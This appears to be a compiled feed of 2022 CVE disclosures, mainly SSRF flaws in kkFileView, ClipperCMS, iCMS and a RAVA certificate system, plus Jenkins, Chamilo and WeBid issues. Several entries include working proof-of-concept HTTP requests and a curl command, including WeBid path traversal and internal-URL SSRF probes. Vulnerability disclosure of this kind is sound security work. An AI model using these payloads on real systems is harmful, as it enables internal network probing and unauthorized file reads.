Jenkins XFramium Builder Plugin 1.0.22 and earlier programmatically disables Content-Security-Policy protection for user-generated content in workspaces, archived artifacts, etc. that Jenkins offers for download.

CVE-2022-43432: Jenkins Security Advisory 2022-10-19

Jenkins Pipeline: Stage View Plugin 2.26 and earlier does not correctly encode the ID of 'input' steps when using it to generate URLs to proceed or abort Pipeline builds, allowing attackers able to configure Pipelines to specify 'input' step IDs resulting in URLs that would bypass the CSRF protection of any target URL in Jenkins.

CVE-2022-43408: Jenkins Security Advisory 2022-10-19

RAVA certificate validation system has inadequate filtering for URL parameter. An unauthenticated remote attacker can perform SSRF attack to discover internal network topology base on query response.

:::

*   首頁
*   資安服務
*   台灣漏洞揭露平台 (TVN)
*   TVN (Taiwan Vulnerability Note) 漏洞公告

TVN ID

TVN-202209011

CVE ID

CVE-2022-39055

CVSS

5.3 (Medium)  
CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:L/I:N/A:N

影響產品

全景軟體 RAVA憑證驗證系統網站 v3

問題描述

RAVA憑證驗證系統網站特定URL參數未作恰當的過濾，遠端攻擊者不須權限，即可進行SSRF攻擊，透過回傳的錯誤訊息判斷目標網址狀態，藉以探測內網狀態。

解決方法

請與全景軟體聯繫提供修補方案

漏洞通報者

Jay Wu吳瑋杰 (Acer Cyber Security Inc., ACSI)

公開日期

2022-10-18

CVE-2022-39055: 全景軟體 RAVA憑證驗證系統網站 - Server-Side Request Forgery (SSRF)

kkFileView 4.0 is vulnerable to Server-side request forgery (SSRF) via controller\OnlinePreviewController.java.

Permalink

Cannot retrieve contributors at this time

**KkFileView has SSRF vulnerabilities**

The server provides the function of obtaining data from other server applications without filtering or restricting addresses and protocols.

Set up the test environment as shown below

Set up kkFileView service on Server1 server and start HTTP service on port 90 of Server2 host

Server2 host Settings do not allow direct access from PC1 hosts

By accessing server1 http://ip:prot/onlinPreview?url=

The Intranet request address to be probed is base64 encoded and used as the URL parameter value for this request

**Related Request packets**

    GET /onlinePreview?url=aHR0cDovLzE5Mi4xNjguMTcuMTUzOjkwL2luZGV4Lmh0bWw= HTTP/1.1
    Host: 192.168.17.128:8012
    User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:105.0) Gecko/20100101 Firefox/105.0
    Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/avif,image/webp,*/*;q=0.8
    Accept-Language: zh-CN,zh;q=0.8,zh-TW;q=0.7,zh-HK;q=0.5,en-US;q=0.3,en;q=0.2
    Accept-Encoding: gzip, deflate
    DNT: 1
    Connection: close
    Upgrade-Insecure-Requests: 1
    

The contents of the Server2 host can be detected in the response package

You can also see Server1 requesting it in Server2's Web services log

120/5000 Check the server\src\main\java\cn\keking\web\controller\OnlinePreviewController.java OnlinePreview function in Java Here is not to the incoming base64 content filtering operation

CVE-2022-42149: paper/ssrf_vul_en.md at main · xiaojiangxl/paper

Chamilo 1.11.16 is affected by an authenticated local file inclusion vulnerability which allows authenticated users with access to 'big file uploads' to copy/move files from anywhere in the file system into the web directory.

CVE-2022-42029: Security issues - Chamilo LMS

A security issue was discovered in WeBid <=1.2.2. A Server-Side Request Forgery (SSRF) vulnerability in the admin/theme.php file allows remote attackers to inject payloads via theme parameters to read files across directories.

**A Path Traversal vulnerability in file_get_contents Function of /admin/theme.php File (WeBid 1.2.2 version)****0x01 Affected version**

vendor: https://github.com/renlok/WeBid

version: <=1.2.2

php version: 7.x

**0x02 Vulnerability description**

A Path Traversal (CWE-22) in admin/theme.php file of WeBid allows remote attackers to uses external input from the theme parameter to construct a pathname that is intended to identify a file or directory that is located underneath a restricted parent directory. This allows you to read any file from any location on the operating system.

if (isset($\_POST\['file'\]) && !empty($\_POST\['theme'\]))
{
	$theme\_path = $theme\_root . '/' . $\_POST\['theme'\];
	if ($\_POST\['theme'\] != 'CVS' && is\_dir($theme\_path) && substr($\_POST\['theme'\], 0, 1) != '.')
	{
		$edit\_file = true;
		$filename = $\_POST\['file'\];
		$theme = $\_POST\['theme'\];
		$filecontents = htmlentities(file\_get\_contents($theme\_path . '/' . $filename));
	}
}

The vulnerable code snippet is shown above. Because the theme parameter is unrestricted, it is also possible to use the server side to get the file information of the corresponding directory, including the file content. The corresponding PoC is as follows:

    POST /WeBid-1.2.1/admin/theme.php HTTP/1.1
    Host: 172.16.119.146
    Content-Length: 75
    Content-Type: application/x-www-form-urlencoded
    Cookie: PHPSESSID=0me7tniqbqltu0jo622cl9jqe6
    Connection: close
    
    file=flag&theme=/../../../../../&csrftoken=f514194228c4c8561ccc9542abcf0289
    

You can also use the following curl command to verify the vulnerability

    curl -i -s -k -X $'POST' \
        -H $'Host: 172.16.119.146' -H $'Content-Length: 75' -H $'Content-Type: application/x-www-form-urlencoded' -H $'Connection: close' \
        -b $'PHPSESSID=0me7tniqbqltu0jo622cl9jqe6' \
        --data-binary $'file=flag&theme=/../../../../../&csrftoken=f514194228c4c8561ccc9542abcf0289' \
        $'http://172.16.119.146/WeBid-1.2.1/admin/theme.php'
    

**0x03 Acknowledgement**

z3

CVE-2022-41477: CVE_Request/WeBid_Path_Traversal.md at master · zer0yu/CVE_Request

The ManageJiraConnectors API in Atlassian Jira Align before version 10.109.2 allows remote attackers to exploit this issue to access internal network resources via a Server-Side Request Forgery. This can be exploited by a remote, unauthenticated attacker with Super Admin privileges by sending a specially crafted HTTP request.

CVE-2022-36802

ClipperCMS 1.3.3 was discovered to contain a Server-Side Request Forgery (SSRF) via the pkg_url parameter at /manager/index.php.

**PoC**

There is a SSRF vulnerability in the pkg\_url parameter of the index.php?a=120 interface in ClipperCMS-clipper\_1.3.3

    manager\actions\package_manager.php
    
    if ((@$_GET['repo'] || $_GET['repo'] === '0') && ctype_digit($_GET['repo']) && $_GET['repo'] < sizeof($repos)) {
    
        $mode = 'repo-list';
        $repo_tag = (isset($_GET['tag']) && ctype_alpha($_GET['tag'])) ? $_GET['tag'] : null;
        $PM_cache_idx = $repo_tag ? $repo_tag : 0;
    
    } elseif ($_SERVER['REQUEST_METHOD'] == 'POST') {
    
        if (@$_POST['pkg_url']) {
    
            $PM = new PackageManager($modx, $_POST['pkg_url']);
            $mode = 'summarise';
    
        } elseif (@$_POST['pkg_folder']) {
    
            $PM = new PackageManager($modx, $_POST['pkg_folder']);
            $mode = 'summarise';
    
        } elseif (isset($_FILES['pkg_file']) && $_FILES['pkg_file']['error'] != UPLOAD_ERR_NO_FILE) {
    
            switch($_FILES['pkg_file']['error']) {
                case UPLOAD_ERR_OK:
                
                    if (is_uploaded_file($_FILES['pkg_file']['tmp_name'])) {
                        $PM = new PackageManager($modx, $_FILES['pkg_file']['tmp_name'], $_FILES['pkg_file']['name']);
                        $mode = 'summarise';
                    } else {
                        $errmsg = $_lang['package_manager_error_internal'];
                    }
                    
                    break;
    
                case UPLOAD_ERR_INI_SIZE:
                    $errmsg = $_lang['package_manager_error_filesize'];
                    break;
    
                default:
                    $errmsg = $_lang['package_manager_error_internal'];
                    break;
        
            }
            ...
    
    

**http://xxxx/manager/index.php?a=120**

    
    POST /manager/index.php?a=120 HTTP/1.1
    Host: 192.168.156.136
    Content-Length: 602
    Cache-Control: max-age=0
    Upgrade-Insecure-Requests: 1
    Origin: http://192.168.156.136
    Content-Type: multipart/form-data; boundary=----WebKitFormBoundaryEJOp0kky1hQLWB2A
    User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/104.0.0.0 Safari/537.36
    Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/avif,image/webp,image/apng,*/*;q=0.8,application/signed-exchange;v=b3;q=0.9
    Referer: http://192.168.156.136/manager/index.php?a=120&repo=0
    Accept-Encoding: gzip, deflate
    Accept-Language: zh,zh-CN;q=0.9
    Cookie: iCMS_ADMIN_AUTH=51bf76419l_i3_t-1_yZJVXGwCgSQ1XfO4exCxVvHn4s8hU09WAjnkVsBo-0gp1LoJu3_X3RBjw9g_ZEpv5avtlt4MCgPGuzQYz31RXZtB9wWh-Yh5JB6CnhL2HOsg; my_wikiUserID=3; my_wikiUserName=123; 4c707ae227f79bf7de196947377b3e3d=da02mk81p3acuoocm7sp7jk4u2; PHPSESSID=rfkgmjgnf85n1qcc1ii3rsqag6; SN6310b3eaca4dc=ru28c1conkikqpb0k7ualk29u5
    Connection: close
    
    ------WebKitFormBoundaryEJOp0kky1hQLWB2A
    Content-Disposition: form-data; name="pkg_url"
    
    http://192.168.156.136:88/111
    ------WebKitFormBoundaryEJOp0kky1hQLWB2A
    Content-Disposition: form-data; name="pkg_file"; filename=""
    Content-Type: application/octet-stream
    
    
    ------WebKitFormBoundaryEJOp0kky1hQLWB2A
    Content-Disposition: form-data; name="pkg_folder"
    
    
    ------WebKitFormBoundaryEJOp0kky1hQLWB2A
    Content-Disposition: form-data; name="verbose"
    
    0
    ------WebKitFormBoundaryEJOp0kky1hQLWB2A
    Content-Disposition: form-data; name="go"
    
    Upload
    ------WebKitFormBoundaryEJOp0kky1hQLWB2A--
    
    

**Acknowledgement**

Thanks to the partners who discovered the vulnerability together：

Yi-fei Gao en-ze wang lin-jie wu

CVE-2022-41497: insight/ClipperCMS SSRF.md at master · jayus0821/insight

iCMS v7.0.16 was discovered to contain a Server-Side Request Forgery (SSRF) via the url parameter at admincp.php.

There is a SSRF vulnerability in the url parameter of the admincp.php interface in iCMS-v7.0.16

    app\spider\spider_tools.class.php
    
    public static function remote($url,$ref=null,$_count = 0) {
            if(self::safe_url($url)===false) return false;
    
            (iPHP_SHELL && self::$debug) && print self::datetime()."\033[36mspider_tools::remote\033[0m [".($_count+1)."] => ".$url.PHP_EOL;
    
            $parsed = parse_url($url);
            $url = str_replace('&amp;', '&', $url);
            if(empty(spider::$referer)){
                spider::$referer = $parsed['scheme'] . '://' . $parsed['host'];
            }
    
            $options = array(
                CURLOPT_URL                  => $url,
                CURLOPT_REFERER              => self::$CURLOPT_REFERER?self::$CURLOPT_REFERER:spider::$referer,
                CURLOPT_USERAGENT            => self::$CURLOPT_USERAGENT?self::$CURLOPT_USERAGENT:spider::$useragent,
                CURLOPT_ENCODING             => self::$CURLOPT_ENCODING?self::$CURLOPT_ENCODING:spider::$encoding,
                CURLOPT_TIMEOUT              => self::$CURLOPT_TIMEOUT,
                CURLOPT_CONNECTTIMEOUT       => self::$CURLOPT_CONNECTTIMEOUT,
                CURLOPT_RETURNTRANSFER       => 1,
                CURLOPT_FAILONERROR          => 0,
                CURLOPT_HEADER               => 0,
                CURLOPT_NOSIGNAL             => true,
                // CURLOPT_DNS_USE_GLOBAL_CACHE => true,
                // CURLOPT_DNS_CACHE_TIMEOUT    => 86400,
                CURLOPT_SSL_VERIFYPEER       => false,
                CURLOPT_SSL_VERIFYHOST       => false
                // CURLOPT_FOLLOWLOCATION => 1,// 使用自动跳转
                // CURLOPT_MAXREDIRS => 7,//查找次数，防止查找太深
            );
            ...
    

    GET c HTTP/1.1
    Host: 192.168.156.136:88
    Upgrade-Insecure-Requests: 1
    User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/104.0.0.0 Safari/537.36
    Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/avif,image/webp,image/apng,*/*;q=0.8,application/signed-exchange;v=b3;q=0.9
    Accept-Encoding: gzip, deflate
    Accept-Language: zh,zh-CN;q=0.9
    Cookie: iCMS_ADMIN_AUTH=b5e13749p_MURGBi7YR3-HetWrkTTKq1pTW78-1apE9T74fye8D9Ticl-PqpZ5raVcOeex3BRI6jYetvGYFegWP00Gv1a4Q2a_RIxQi81T1HtLgYm00OzJzHEb-pVQ
    Connection: close

CVE-2022-41496: insight/iCMS SSRF.md at master · jayus0821/insight

ClipperCMS 1.3.3 was discovered to contain a Server-Side Request Forgery (SSRF) via the rss_url_news parameter at /manager/index.php.

There is a SSRF vulnerability in the rss\_url\_news parameter of the index.php?a=30 interface in ClipperCMS-clipper\_1.3.3

    POST /manager/index.php?a=30 HTTP/1.1
    Host: 192.168.156.136
    Content-Length: 6669
    Cache-Control: max-age=0
    Upgrade-Insecure-Requests: 1
    Origin: http://192.168.156.136
    Content-Type: application/x-www-form-urlencoded
    User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/104.0.0.0 Safari/537.36
    Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/avif,image/webp,image/apng,*/*;q=0.8,application/signed-exchange;v=b3;q=0.9
    Referer: http://192.168.156.136/manager/index.php?a=17
    Accept-Encoding: gzip, deflate
    Accept-Language: zh,zh-CN;q=0.9
    Cookie: iCMS_ADMIN_AUTH=51bf76419l_i3_t-1_yZJVXGwCgSQ1XfO4exCxVvHn4s8hU09WAjnkVsBo-0gp1LoJu3_X3RBjw9g_ZEpv5avtlt4MCgPGuzQYz31RXZtB9wWh-Yh5JB6CnhL2HOsg; my_wikiUserID=3; my_wikiUserName=123; 4c707ae227f79bf7de196947377b3e3d=da02mk81p3acuoocm7sp7jk4u2; PHPSESSID=rfkgmjgnf85n1qcc1ii3rsqag6; SN6310b3eaca4dc=ru28c1conkikqpb0k7ualk29u5; KCFINDER_showname=on; KCFINDER_showsize=off; KCFINDER_showtime=off; KCFINDER_order=name; KCFINDER_orderDesc=off; KCFINDER_view=thumbs; KCFINDER_displaySettings=off
    Connection: close
    
    site_id=6310b3eb4111b&settings_version=1.3.3&site_name=My+Clipper+Site&valid_hostnames=&modx_charset=UTF-8&xhtml_urls=1&site_start=1&error_page=1&unauthorized_page=1&site_status=1&site_unavailable_page=&reload_site_unavailable=&site_unavailable_message=The+site+is+currently+unavailable&siteunavailable_message_default=The+site+is+currently+unavailable.&track_visitors=0&auto_template_logic=parent&template_rules_tv=&default_template=3&old_template=3&publish_default=0&cache_default=1&search_default=1&auto_menuindex=1&txt_custom_contenttype=&custom_contenttype=application%2Frss%2Bxml%2Capplication%2Fpdf%2Capplication%2Fvnd.ms-word%2Capplication%2Fvnd.ms-excel%2Ctext%2Fhtml%2Ctext%2Fcss%2Ctext%2Fxml%2Ctext%2Fjavascript%2Ctext%2Fplain&server_offset_time=0&server_protocol=http&rss_len=10&error_handling_deprecated=1&error_handling_silent=0&jquery_url=assets%2Fjs%2Fjquery.min.js&jquery_plugin_dir=assets%2Fjs%2F&jquery_noconflict=1&friendly_urls=0&friendly_url_prefix=&friendly_url_suffix=.html&friendly_alias_urls=1&use_alias_path=0&allow_duplicate_alias=0&automatic_alias=1&use_udperms=1&udperms_allowroot=0&failed_login_attempts=3&webuser_hash_method=1&blocked_minutes=60&reload_captcha_words=&captcha_words=Clipper%2CAccess%2CBetter%2CBitCode%2CCache%2CDesc%2CDesign%2CExcell%2CEnjoy%2CURLs%2CTechView%2CGerald%2CGriff%2CHumphrey%2CHoliday%2CIntel%2CIntegration%2CJoystick%2CJoin%28%29%2CTattoo%2CGenetic%2CLight%2CLikeness%2CMarit%2CMaaike%2CNiche%2CNetherlands%2COrdinance%2COscillo%2CParser%2CPhusion%2CQuery%2CQuestion%2CRegalia%2CRighteous%2CSnippet%2CSentinel%2CTemplate%2CThespian%2CUnity%2CEnterprise%2CVerily%2CVeri%2CWebsite%2CWideWeb%2CYap%2CYellow%2CZebra%2CZygote&captcha_words_default=ClipperCMS%2CAccess%2CBetter%2CBitCode%2CChunk%2CCache%2CDesc%2CDesign%2CExcell%2CEnjoy%2CURLs%2CTechView%2CGerald%2CGriff%2CHumphrey%2CHoliday%2CIntel%2CIntegration%2CJoystick%2CJoin%28%29%2COscope%2CGenetic%2CLight%2CLikeness%2CMarit%2CMaaike%2CNiche%2CNetherlands%2COrdinance%2COscillo%2CParser%2CPhusion%2CQuery%2CQuestion%2CRegalia%2CRighteous%2CSnippet%2CSentinel%2CTemplate%2CThespian%2CUnity%2CEnterprise%2CVerily%2CTattoo%2CVeri%2CWebsite%2CWideWeb%2CYap%2CYellow%2CZebra%2CZygote&emailsender=1%401.com&smtp=0&smtp_host=&smtp_port=&smtp_prefix=ssl&smtp_user=&smtp_pass=&reload_emailsubject=&emailsubject=Your+login+details&emailsubject_default=Your+login+details&reload_signupemail_message=&signupemail_message=Hello+%5B%2Buid%2B%5D+%0D%0A%0D%0AHere+are+your+login+details+for+%5B%2Bsname%2B%5D+Content+Manager%3A%0D%0A%0D%0AUsername%3A+%5B%2Buid%2B%5D%0D%0APassword%3A+%5B%2Bpwd%2B%5D%0D%0A%0D%0AOnce+you+log+into+the+Content+Manager+%28%5B%2Bsurl%2B%5D%29%2C+you+can+change+your+password.%0D%0A%0D%0ARegards%2C%0D%0ASite+Administrator&system_email_signup_default=Hello+%5B%2Buid%2B%5D+%0D%0A%0D%0AHere+are+your+login+details+for+%5B%2Bsname%2B%5D+Content+Manager%3A%0D%0A%0D%0AUsername%3A+%5B%2Buid%2B%5D%0D%0APassword%3A+%5B%2Bpwd%2B%5D%0D%0A%0D%0AOnce+you+log+into+the+Content+Manager+%28%5B%2Bsurl%2B%5D%29%2C+you+can+change+your+password.%0D%0A%0D%0ARegards%2C%0D%0ASite+Administrator&reload_websignupemail_message=&websignupemail_message=Hello+%5B%2Buid%2B%5D%0D%0A%0D%0AHere+are+your+login+details+for+%5B%2Bsname%2B%5D%3A%0D%0A%0D%0AUsername%3A+%5B%2Buid%2B%5D%0D%0APassword%3A+%5B%2Bpwd%2B%5D%0D%0A%0D%0AOnce+you+log+into+%5B%2Bsname%2B%5D+%28%5B%2Bsurl%2B%5D%29%2C+you+can+change+your+password.%0D%0A%0D%0ARegards%2C%0D%0ASite+Administrator&system_email_websignup_default=Hello+%5B%2Buid%2B%5D%0D%0A%0D%0AHere+are+your+login+details+for+%5B%2Bsname%2B%5D%3A%0D%0A%0D%0AUsername%3A+%5B%2Buid%2B%5D%0D%0APassword%3A+%5B%2Bpwd%2B%5D%0D%0A%0D%0AOnce+you+log+into+%5B%2Bsname%2B%5D+%28%5B%2Bsurl%2B%5D%29%2C+you+can+change+your+password.%0D%0A%0D%0ARegards%2C%0D%0ASite+Administrator&reload_system_email_webreminder_message=&webpwdreminder_message=Hello+%5B%2Buid%2B%5D%0D%0A%0D%0ATo+activate+your+new+password+click+the+following+link%3A%0D%0A%0D%0A%5B%2Bsurl%2B%5D%0D%0A%0D%0AIf+successful+you+can+use+the+following+password+to+login%3A%0D%0A%0D%0APassword%3A%5B%2Bpwd%2B%5D%0D%0A%0D%0AIf+you+did+not+request+this+email+then+please+ignore+it.%0D%0A%0D%0ARegards%2C%0D%0ASite+Administrator&system_email_webreminder_default=Hello+%5B%2Buid%2B%5D%0D%0A%0D%0ATo+activate+your+new+password+click+the+following+link%3A%0D%0A%0D%0A%5B%2Bsurl%2B%5D%0D%0A%0D%0AIf+successful+you+can+use+the+following+password+to+login%3A%0D%0A%0D%0APassword%3A%5B%2Bpwd%2B%5D%0D%0A%0D%0AIf+you+did+not+request+this+email+then+please+ignore+it.%0D%0A%0D%0ARegards%2C%0D%0ASite+Administrator&manager_language=english&manager_theme=ClipperModern&warning_visibility=1&docid_visibility=1&tree_page_click=27&remember_last_tab=1&tree_show_protected=0&rss_url_news=http%3A%2F%2F192.168.156.136%3A88%2F123&rss_url_security=http%3A%2F%2F192.168.156.136%3A88%2F123123123&datepicker_year_range=-10&date_format=dd-mm-yy&time_format=HH%3Amm%3Ass&number_of_logs=100&number_of_results=20&validate_referer=1&strip_image_paths=1&use_browser=1&rb_webuser=0&rb_base_dir=A%3A%2Frecent%2Fwez_paper%2Fcms%2FClipperCMS-clipper_1.3.3%2FClipperCMS-clipper_1.3.3%2Fassets%2F&rb_base_url=assets%2F&file_browser=kcfinder&upload_images=bmp%2Cico%2Cgif%2Cjpeg%2Cjpg%2Cpng%2Cpsd%2Ctif%2Ctiff&upload_media=au%2Cavi%2Cmp3%2Cmp4%2Cmpeg%2Cmpg%2Cwav%2Cwmv&upload_flash=fla%2Cflv%2Cswf&clean_uploaded_filename=0&use_editor=1&which_editor=TinyMCE&fe_editor_lang=english&editor_css_path=&tinymce_editor_theme=editor&tinymce_custom_plugins=style%2Cadvimage%2Cadvlink%2Csearchreplace%2Cprint%2Ccontextmenu%2Cpaste%2Cfullscreen%2Cnonbreaking%2Cxhtmlxtras%2Cvisualchars%2Cmedia&tinymce_custom_buttons1=undo%2Credo%2Cselectall%2Cseparator%2Cpastetext%2Cpasteword%2Cseparator%2Csearch%2Creplace%2Cseparator%2Cnonbreaking%2Chr%2Ccharmap%2Cseparator%2Cimage%2Clink%2Cunlink%2Canchor%2Cmedia%2Cseparator%2Ccleanup%2Cremoveformat%2Cseparator%2Cfullscreen%2Cprint%2Ccode%2Chelp&tinymce_custom_buttons2=bold%2Citalic%2Cunderline%2Cstrikethrough%2Csub%2Csup%2Cseparator%2Cbullist%2Cnumlist%2Coutdent%2Cindent%2Cseparator%2Cjustifyleft%2Cjustifycenter%2Cjustifyright%2Cjustifyfull%2Cseparator%2Cstyleselect%2Cformatselect%2Cseparator%2Cstyleprops&tinymce_custom_buttons3=&tinymce_custom_buttons4=&tinymce_css_selectors=&filemanager_path=A%3A%2Frecent%2Fwez_paper%2Fcms%2FClipperCMS-clipper_1.3.3%2FClipperCMS-clipper_1.3.3%2F&upload_files=aac%2Cau%2Cavi%2Ccss%2Ccache%2Cdoc%2Cdocx%2Cgz%2Cgzip%2Chtaccess%2Chtm%2Chtml%2Cjs%2Cmp3%2Cmp4%2Cmpeg%2Cmpg%2Cods%2Codp%2Codt%2Cpdf%2Cppt%2Cpptx%2Crar%2Ctar%2Ctgz%2Ctxt%2Cwav%2Cwmv%2Cxls%2Cxlsx%2Cxml%2Cz%2Czip&upload_maxsize=1048576&new_file_permissions=0644&new_folder_permissions=0755

Tag

#ssrf